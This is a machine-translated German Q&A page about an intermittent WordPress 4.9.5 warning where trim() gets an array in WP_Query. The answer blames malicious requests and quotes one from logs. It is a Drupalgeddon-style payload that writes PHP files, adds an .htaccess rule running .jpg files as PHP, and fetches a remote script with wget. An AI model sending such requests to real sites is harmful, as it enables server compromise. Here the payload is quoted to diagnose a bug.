it-swarm.com.de

Wordpress 4.9.5 PHP Die intermittierende Warnung trim () erwartet, dass Parameter 1 ein String ist, wobei ein Array angegeben wird

Ich verwende Wordpress 4.9.5 und sehe gelegentlich den folgenden Fehler in meinen Protokollen.

E_WARNING: trim() expects parameter 1 to be string, array given

Die Stapelablaufverfolgung sieht folgendermaßen aus, sodass sie nicht aus benutzerdefiniertem Themencode stammt.

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)

Ist dies ein bekannter/unbekannter Wordpress-Fehler und gibt es eine Lösung dafür?

4
crmpicco

Ich bin heute darauf gestoßen. Es ist ein Fehler. Ich habe hier einen Fehlerbericht eingereicht:

https://core.trac.wordpress.org/ticket/46797

Das Problem ist diese Codezeile:

$qv['name'] = trim( $qv['name'] );

Quelle: https://github.com/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

Ein (böswilliger) Benutzer sendet eine Anfrage, die wie folgt aussieht:

GET /? Q = Benutzer/Passwort & Name [#post_render] [] = Durchgang & Name [#type] = Markup & Name [#markup] = Echo 'Vuln !! flicken Sie es jetzt! ' > vuln.htm; echo 'Vuln !!'> sites/default/files/vuln.php; echo 'Vuln !!'> vuln.php; cd sites/default/files /; echo 'AddType application/x-httpd-php .jpg'> .htaccess; wget ' http://40k.waszmann.de/Deutsch/images/up.php '

Eine solche Anfrage macht $ qv ['name'] zu einem Array, nicht zu einer Zeichenkette.

Muss saniert werden.

3
conner_bw